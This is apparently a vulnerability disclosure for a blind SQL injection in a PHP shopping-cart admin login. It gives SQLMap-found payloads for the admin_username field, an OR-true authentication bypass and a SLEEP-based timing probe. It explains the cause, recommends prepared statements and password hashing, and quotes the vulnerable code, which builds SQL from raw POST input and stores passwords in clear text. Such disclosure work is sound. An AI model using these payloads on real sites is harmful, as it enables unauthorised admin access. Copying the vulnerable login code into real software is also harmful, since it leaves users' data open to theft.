# Exploit Title: Edge SkateShop Blind SQL Injection
# Date: 12/12/2016
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html
# Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip
# Version: n/a
# Tested on: Kali Linux

# Proof of Concept (using SQLMap):

Parameter: admin_username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: admin_username=-8520' OR 6015=6015-- PORX&admin_password=&admin_login=Scmp

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: admin_username=yzsT' OR SLEEP(5)-- Qgnn&admin_password=&admin_login=Scmp

# Issue:
# The admin login handler copies admin_username and admin_password from $_POST
# directly into the quoted SQL string, so a single quote in either field ends
# the string literal and the remainder is parsed as SQL. The fix is a prepared
# statement with bound parameters (mysqli_prepare / mysqli_stmt_bind_param);
# the password, which the query compares as submitted and so is apparently
# stored in clear text, should be stored as a hash and checked with
# password_verify(). The excerpt below ends before the closing brace of the
# outer if block.

if(isset($_POST['admin_login']))
{
    $admin_username=$_POST['admin_username'];
    $admin_password=$_POST['admin_password'];
    $check_admin="select * from admin WHERE admin_username='$admin_username' AND admin_password='$admin_password'";
    $run=mysqli_query($dbcon,$check_admin);
    if(mysqli_num_rows($run))
    {
        echo "<script>alert('You're successfully login!')</script>";
        echo "<script>window.open('Admin/index.php','_self')</script>";
        $_SESSION['admin_username']=$admin_username;
    }
    else
    {
        echo "<script>alert('Username or password is incorrect!')</script>";
        echo "<script>window.open('index.php','_self')</script>";
        exit();
    }